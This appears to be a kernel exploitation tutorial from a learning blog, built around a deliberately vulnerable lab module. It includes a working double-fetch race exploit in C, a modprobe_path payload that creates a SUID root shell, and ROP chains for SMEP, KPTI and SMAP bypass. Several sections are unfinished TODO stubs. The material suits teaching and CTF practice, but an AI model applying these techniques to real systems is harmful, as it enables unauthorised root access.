LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
/* ... */
} __randomize_layout;
struct task_struct {
/* ... */
/*
* Pointers to the (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->real_parent->pid)
*/
/* Real parent process: */
struct task_struct __rcu *real_parent;
/* Recipient of SIGCHLD, wait4() reports: */
struct task_struct __rcu *parent;
/*
* Children/sibling form the list of natural children:
*/
struct list_head children;
struct list_head sibling;
struct task_struct *group_leader;
/* ... */
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
/* ... */
};
/*
* The security context of a task
*
* The parts of the context break down into two categories:
*
* (1) The objective context of a task. These parts are used when some other
* task is attempting to affect this one.
*
* (2) The subjective context. These details are used when the task is acting
* upon another object, be that a file, a task, a key or whatever.
*
* Note that some members of this structure belong to both categories - the
* LSM security pointer for instance.
*
* A task has two security pointers. task->real_cred points to the objective
* context that defines that task's actual details. The objective part of this
* context is used whenever that task is acted upon.
*
* task->cred points to the subjective context that defines the details of how
* that task is going to act upon another object. This may be overridden
* temporarily to point to another security context, but normally points to the
* same context as task->real_cred.
*/
#define PASSWORD "p4ssw0rd"
typedef struct {
int id;
char password[10];
} Credentials;
static int id = 1001;
static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
Credentials *creds = (Credentials *)buf;
printk(KERN_INFO "[Double-Fetch] Reading password from user...");
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
// to increase reliability
msleep(1000);
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
return -1;
}
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
int res_id = write(fd, &creds, 0); // last parameter here makes no difference
printf("New ID: %d\n", res_id);
return 0;
}
gcc -static -o exploit exploit.c
$ dmesg
[...]
[ 3.104165] [Double-Fetch] Password correct! ID set to 900
Credentials *creds = (Credentials *)buf;
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
// gcc -static -o exploit -pthread exploit.c
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *switcher(void *arg);
typedef struct {
int id;
char password[10];
} Credentials;
int main() {
// communicate with the module
int fd = open("/dev/double_fetch", O_RDWR);
printf("FD: %d\n", fd);
// use a random ID and set the password correctly
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
// set up the switcher thread
// pass it a pointer to `creds`, so it can modify it
pthread_t thread;
if (pthread_create(&thread, NULL, switcher, &creds)) {
fprintf(stderr, "Error creating thread\n");
return -1;
}
// now we write the cred struct to the module
// it should be swapped after about .3 seconds by switcher
int res_id = write(fd, &creds, 0);
// write returns the id we switched to
// if all goes well, that is 0
printf("New ID: %d\n", res_id);
// finish thread cleanly
if (pthread_join(thread, NULL)) {
fprintf(stderr, "Error joining thread\n");
return -1;
}
return 0;
}
void *switcher(void *arg) {
Credentials *creds = (Credentials *)arg;
// wait until the module is sleeping - don't want to change it BEFORE the initial ID check!
usleep(300000); // 0.3 seconds - sleep() only takes whole seconds
creds->id = 0;
return NULL;
}
The kernel can request that a kernel module is loaded at runtime. If it does so, it will try to call request_module, which will spawn the modprobe tool using call_modprobe. modprobe is a userspace program that runs with root privileges; it finds the required kernel module binary on the filesystem and loads it.
The path to modprobe is in modprobe_path, a global variable in the kernel. We can read the value as a non-root user through /proc/sys/kernel/modprobe, with the default value being /sbin/modprobe.
If we can overwrite modprobe_path with another binary, e.g. /tmp/exec, this will be run with root privileges! That makes it very easy. To trigger modprobe, the easiest way is to execute a binary with an unknown signature:
To identify what program should be run to handle the signature, the kernel searches its registered binary format handlers (the code is slightly different in newer versions); if none of them recognise the signature, request_module is called - and with it, modprobe.
The approach, therefore, is simple. First, compile a /tmp/hijack binary with the following source:
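A minimal sketch of one possible payload (any root-run program that drops an SUID shell will do):

// /tmp/hijack - compile statically, like the exploit itself
#include <stdlib.h>

int main() {
    // we run as root when the kernel spawns us via modprobe_path
    system("cp /bin/sh /tmp/sh && chmod u+s /tmp/sh");
    return 0;
}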
There are lots of possible payloads, but the end result is the same. This will copy /bin/sh to /tmp/sh and make it SUID. Now we create a file with an unknown signature:
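For example, from within the exploit itself (the path /tmp/fake is just a convention here):

#include <fcntl.h>
#include <unistd.h>

// write a bogus 4-byte "signature" that no binfmt handler will recognise
void make_trigger(void) {
    int fd = open("/tmp/fake", O_WRONLY | O_CREAT, 0777);
    write(fd, "\xff\xff\xff\xff", 4);
    close(fd);
}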
Finally, overwrite modprobe_path to /tmp/hijack. When we execute /tmp/fake as a regular user, the kernel will spawn /tmp/hijack with root privileges and execute it!
Example
TODO
Debugging a Kernel Module
A practical example
Trying on the Latest Kernel
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5). The offsets of commit_creds and prepare_kernel_cred() are as follows, and we'll update exploit.c with the new values:
The major number needs to be updated to 253 in init for this version! I've done it automatically, but it bears remembering if you ever try to create your own module.
Instead of an elevated shell, we get a kernel panic, with the following data dump:
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually ran into this issue myself, so it happens to all of us!
One thing we notice is that the error here is listed as a NULL pointer dereference. We can see that the error is thrown in commit_creds():
We could debug it to check, but chances are that the parameter passed to commit_creds() is NULL - and this appears to be the case, since RDI is shown to be 0 above!
Opening a GDBserver
In our run.sh script, we now include the -s flag. This flag opens up a GDB server on port 1234, so we can connect to it and debug the kernel. Another useful flag is -S, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit binary just before the write() call by using getchar(), which will hang until we hit Enter or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds() is 0xffffffff81077390, we can set a breakpoint there.
We then continue with c and go back to the VM terminal, where we hit Enter to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0:
This explains the NULL dereference. RAX is also 0, in fact, so it's not a problem with the mov:
This means that prepare_kernel_cred() is returning NULL. Why is that? It didn't do that before!
Finding the Issue
Let's compare the differences in the prepare_kernel_cred() code between kernel 5.10 and 6.10:
The first and last parts are effectively identical, so there's no issue there. The issue arises in the way it handles a NULL argument. On 5.10, it treats it as using init_task:
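Paraphrased (not the verbatim source), the 5.10 fallback is to the init task's credentials, init_cred:

if (daemon)
    old = get_task_cred(daemon);
else
    old = get_cred(&init_cred);    /* NULL falls back to the init credentials */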
i.e. if daemon is NULL, use init_task. On 6.10, the behaviour is altogether different:
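Roughly (again paraphrased rather than quoted), 6.x now does:

if (WARN_ON_ONCE(!daemon))
    return NULL;                   /* a NULL daemon is rejected outright */
old = get_task_cred(daemon);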
If daemon is NULL, return NULL - hence our issue! Instead, we have to pass a valid cred struct into RDI. The simplest way is to just pass init_cred, which is actually a static offset from the kernel base! This means that if we're in a position to get commit_creds and prepare_kernel_cred, we can also get init_cred without major issues.
Passing in init_cred
init_cred is defined in kernel/cred.c. There is no symbol associated with it (unless the kernel was compiled with debugging symbols), so we can't read /proc/kallsyms and get the address like that.
Kernel ROP - Disabling SMEP
An old technique
Setup
Using the same setup as ret2usr, we make one single modification in run.sh:
Now if we load the VM and run our exploit from last time, we get a kernel panic.
Kernel Panic
It's worth noting what it looks like for the future - especially these 3 lines:
Overwriting CR4
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(). This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms (if we update init to log us in as root):
Ok, it's located at 0xffffffff8102b6d0. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
CR4 is currently 0x00000000001006b0. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0.
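As a quick sanity check of that bit of arithmetic:

unsigned long cr4 = 0x1006b0UL;
cr4 &= ~(1UL << 20);    // clear bit 20 (SMEP)
// cr4 is now 0x6b0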
The last thing we need to do is find some gadgets. For that, we have to convert the bzImage file into a vmlinux ELF file so that we can run ropper or ROPgadget on it, which we can do with the extract-vmlinux script from the official Linux git repository.
Putting it all together
All that changes in the exploit is the overflow:
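As a sketch, with placeholder gadget addresses (yours will come from ropper/ROPgadget against the extracted vmlinux):

#define POP_RDI_RET       0xffffffffdead0001UL   // pop rdi; ret (placeholder)
#define NATIVE_WRITE_CR4  0xffffffff8102b6d0UL   // from /proc/kallsyms

unsigned long payload[10];
for (int j = 0; j < 6; j++)
    payload[j] = 0x4141414141414141;      // padding up to the saved RIP
int i = 6;
payload[i++] = POP_RDI_RET;
payload[i++] = 0x6b0;                     // CR4 with the SMEP bit cleared
payload[i++] = NATIVE_WRITE_CR4;          // "disable" SMEP
payload[i++] = (unsigned long)escalate;   // then jump to our userland function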
We can then compile it and run.
Failure
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
SMEP is enabled again. How? If we debug it, we definitely hit both the gadget and the call to native_write_cr4(). What gives?
Well, if we look at the source of native_write_cr4(), there's another feature:
Essentially, it will check whether the val we pass in clears any of the bits defined in cr4_pinned_bits. This value is set up during boot and stops "sensitive CR bits" from being modified; if any pinned bits have been cleared, they are simply set again before the write goes through. Effectively, modifying CR4 this way doesn't work any longer - and hasn't since CR4 pinning was introduced.
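The pinning logic looks approximately like this (paraphrased from arch/x86/kernel/cpu/common.c, not quoted verbatim):

void native_write_cr4(unsigned long val)
{
    unsigned long bits_changed = 0;
set_register:
    asm volatile("mov %0,%%cr4" : "+r" (val) : : "memory");

    if (static_branch_likely(&cr_pinning)) {
        if (unlikely((val & cr4_pinned_bits) != cr4_pinned_bits)) {
            bits_changed = (val & cr4_pinned_bits) ^ cr4_pinned_bits;
            val |= cr4_pinned_bits;       /* put the pinned bits back */
            goto set_register;
        }
        /* warn once after the register has been corrected */
        WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n", bits_changed);
    }
}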
Kernel ROP - Privilege Escalation in Kernel Space
Bypassing SMEP by ropping through the kernel
The previous approach failed, so let's try and escalate privileges using purely ROP.
Modifying the Payload
Calling prepare_kernel_cred()
First, we have to change the ropchain. Start off with finding some useful gadgets and calling prepare_kernel_cred(0):
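For instance (continuing the overflow payload from before; both addresses are placeholders - the pop rdi; ret gadget comes from the gadget hunt, prepare_kernel_cred from /proc/kallsyms):

#define POP_RDI_RET          0xffffffffdead0001UL   // placeholder
#define PREPARE_KERNEL_CRED  0xffffffffdead0002UL   // placeholder

payload[i++] = POP_RDI_RET;
payload[i++] = 0;                        // prepare_kernel_cred(0)
payload[i++] = PREPARE_KERNEL_CRED;      // cred pointer ends up in RAX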
Now comes the trickiest part, which involves moving the result from RAX to RDI before calling commit_creds().
Moving RAX to RDI for commit_creds()
This requires stringing together a collection of gadgets (which took me an age to find). See if you can find them!
I ended up combining these four gadgets:
Gadget 1 is used to set RDX to 0, so we bypass the jne in Gadget 2 and hit ret
Gadget 2 and Gadget 3 move the returned cred struct from RAX to RDX
Returning to userland
Recall that we need swapgs and then iretq. Both can be found easily.
The pop rbp; ret is not important as iretq jumps away anyway.
To simulate the pushing of RIP, CS, SS, etc., we just create the stack layout iretq expects - RIP|CS|RFLAGS|SP|SS, the reverse of the order they are pushed in.
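The tail of the ropchain therefore looks something like this (gadget addresses are placeholders; the user_* values are the ones we saved at the start of the exploit):

payload[i++] = SWAPGS_POP_RBP_RET;        // swapgs; pop rbp; ret (placeholder)
payload[i++] = 0;                         // dummy rbp
payload[i++] = IRETQ;                     // iretq gadget (placeholder)
payload[i++] = (unsigned long)get_shell;  // RIP
payload[i++] = user_cs;                   // CS
payload[i++] = user_rflags;               // RFLAGS
payload[i++] = user_sp;                   // RSP
payload[i++] = user_ss;                   // SS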
If we try this now, we successfully escalate privileges!
Final Exploit
KPTI
Kernel Page Table Isolation
KPTI is designed to protect against attacks that abuse the shared user/kernel address space. Originally called KAISER, it is a mitigation created to prevent Meltdown-style microarchitectural attacks.
KPTI separates the page tables for user space and kernel space, creating two sets.
The first set, used by the kernel, includes a complete mapping of user space that the kernel can use for things like copy_to_user(). This page table has the NX bit set for userspace memory.
The user set maps the minimum amount of kernel virtual memory possible (e.g. exception handlers and code required for the user to transition to the kernel).
You can disable KPTI from the command line via the nopti argument. It is also automatically disabled if the CPU is not affected by Meltdown.
Consequences and Bypasses
When in the user context, the kernel is not fully mapped. This doesn't affect most of our exploits, since they are executed in kernel mode.
However, when in kernel mode, userspace is mapped as non-executable. This means that we can't return to an escalate() function via iretq. The solution to this is to swap page tables back to user ones.
To achieve this, we can abuse a helpfully named kernel function called swapgs_restore_regs_and_return_to_usermode. Disassembling it (TODO!), we see that it starts with a load of pop instructions, followed by a few mov and push operations, then a page table switch, a swapgs and an iretq. We can jump to just after the pop instructions so we don't have to supply junk values for them on the stack. This is commonly called a KPTI trampoline.
TODO example
Bypassing KPTI via a SIGSEGV Handler
Trying to return to user mode via iretq without switching page tables results in a SIGSEGV rather than a kernel crash, because we are in userspace.
An alternative method is therefore to use a SIGSEGV handler - the exploit gets root privileges, then tries to access userland and triggers a SIGSEGV. The kernel fault handler will switch the page tables for us when dispatching to the handler!
TODO example
SMAP
Supervisor Memory Access Protection
SMAP is a more powerful version of SMEP. Instead of just preventing user space code from being executed by the kernel, SMAP places heavy restrictions on accessing user space at all, even for data - the kernel cannot even dereference (i.e. read) data that isn't in kernel space except through a small set of very specific functions.
For example, functions such as strcpy or memcpy do not work for copying data to and from user space when SMAP is enabled. Instead, we are provided the functions copy_from_user and copy_to_user, which are allowed to briefly bypass SMAP for the duration of their operation. These functions also have additional hardening against attacks such as buffer overflows, with the function __copy_overflow acting as a guard against them.
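For illustration, this is roughly how a well-behaved module takes data from userspace (the module, handler and buffer names here are made up):

#include <linux/fs.h>
#include <linux/uaccess.h>

static char kbuf[0x20];

static ssize_t safe_write(struct file *filp, const char __user *buf,
                          size_t count, loff_t *f_pos)
{
    if (count > sizeof(kbuf))
        count = sizeof(kbuf);
    /* copy_from_user briefly lifts SMAP (stac/clac) just for this copy */
    if (copy_from_user(kbuf, buf, count))
        return -EFAULT;
    return count;
}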
This means that whether you interact using write/read or ioctl, the structs that you pass via pointers all get copied to kernel space using these functions before they are messed around with. This also means that double-fetches are even more unlikely to occur as all operations are based on the snapshot of the data that the module took when copy_from_user was called (unless copy_from_user is called on the same struct multiple times).
Like SMEP, SMAP is controlled by the CR4 register, in this case the 21st bit. It is also pinned, so overwriting CR4 does nothing; instead we have to work around it. There is no one specific "bypass" - it will depend on the challenge and simply has to be accounted for.
Enabling SMAP is just as easy as SMEP:
Sometimes it needs to be disabled instead, in which case the option is nosmap.
Stac and Clac Instructions
TODO
Putting Exploit Data Into Kernel Memory instead of Userspace